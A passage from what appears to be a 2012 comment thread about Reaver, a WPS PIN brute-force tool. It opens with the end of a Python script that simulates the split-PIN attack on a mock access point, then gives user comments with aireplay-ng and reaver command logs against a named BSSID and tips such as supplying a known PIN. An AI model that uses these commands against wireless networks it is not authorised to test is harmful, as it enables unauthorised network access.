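            return candidate, ap.exchanges
    raise RuntimeError("second half never confirmed")


def worst_case_attempts() -> int:
    """10^4 + 10^3 exchanges, not 10^7: each half is confirmed on its own."""
    return 10_000 + 1_000


def expected_attempts() -> float:
    """Mean exchanges for a uniformly random PIN: (10000+1)/2 + (1000+1)/2."""
    return (10_000 + 1) / 2 + (1_000 + 1) / 2


if __name__ == "__main__":
    ap = SimulatedAP(full_pin("1234567"))  # constructed target PIN 12345670
    pin, used = crack(ap)
    print(f"recovered {pin} after {used} exchanges "
          f"(worst case {worst_case_attempts()}, mean {expected_attempts():.1f})")
```

Phase 1 treats a NACK after M6 the same as an M7 reply, because both mean the AP accepted digits 1-4; that is why the search never needs more than 11,000 exchanges and why, as lawrence computes, about half of the PIN space is covered after roughly 5,500. A lockout or a button-gated registrar breaks this model: the attempt count is then bounded by the AP's policy, not by the PIN space.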

Comment by ObiDanKi...@gmail.com, Feb 12, 2012
P.s to slightly unconfuse things (hopefully): the first script, the one that kills network manager etc., I called net.sh =P
If you want to do the kill process manually just do a ps -A and look for the pid of network manager and wpa_supplicant and enter a kill -9 command.

Comment by demon.ia...@hotmail.com, Feb 13, 2012
Graphical environments:
WPSCrackGUI v1.0.6 = https://sourceforge.net/projects/wpscrackgui/
Inflator v1.0 = http://blog.ibeini.com/archives/597.html for Ubuntu and Beini.

Comment by ashag...@gmail.com, May 4, 2012
I'm trying reaver 1.4 but till now nothing has happened XD. I'm using BT5 R2 in VMware with an Intex Cosmos wireless card.

Interface  Chipset                    Driver
wlan2      Realtek RTL8187BvB(early)  rtl8187 - [phy0]
mon0       Realtek RTL8187BvB(early)  rtl8187 - [phy0]

root@bt:~# aireplay-ng -9 mon0
01:04:56 Trying broadcast probe requests...
01:04:56 Injection is working!
01:04:58 Found 8 APs
01:05:10 B4:82:FE:0D:E1:D7 - channel: 1 - 'PAPILLON'
01:05:10 Ping (min/avg/max): 1.969ms/6.104ms/13.109ms Power: -33.23
01:05:10 30/30: 100%

root@bt:~# reaver -i mon0 -b B4:82:FE:0D:E1:D7 -c 1 --v
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from B4:82:FE:0D:E1:D7
[!] WARNING: Failed to associate with B4:82:FE:0D:E1:D7 (ESSID: PAPILLON)
[!] WARNING: Failed to associate with B4:82:FE:0D:E1:D7 (ESSID: PAPILLON)
[!] WARNING: Failed to associate with B4:82:FE:0D:E1:D7 (ESSID: PAPILLON)

So why did it fail to associate? ^^

Comment by Biohunte...@gmail.com, May 15, 2012
Is it possible to "tell" Reaver a specific PIN to use? I'm in a situation where I have the WPS pin, but not the WPA2 key.....

Comment by shkurko....@gmail.com, May 17, 2012
Use --pin 12345670

Comment by pa.bil...@gmail.com, May 20, 2012
Hi guys, some pb! When I launch reaver -i mon0 ... it switches to the right channel, then it associates, but nothing else! When I ctrl-c it ends with nothing saved :( Some ideas? Thx

Comment by devera.m...@gmail.com, Jun 1, 2012
I already have the WPS pin and PSK. How can I use this to log in to the wifi network? If I use these as passwords, I can't get connected. Please guide me with this.

Comment by IslandDi...@gmail.com, Jun 13, 2012
How do I import saved WPS pins from one Linux machine to another? I found the reaver file but can't seem to find the saved files for it. ?
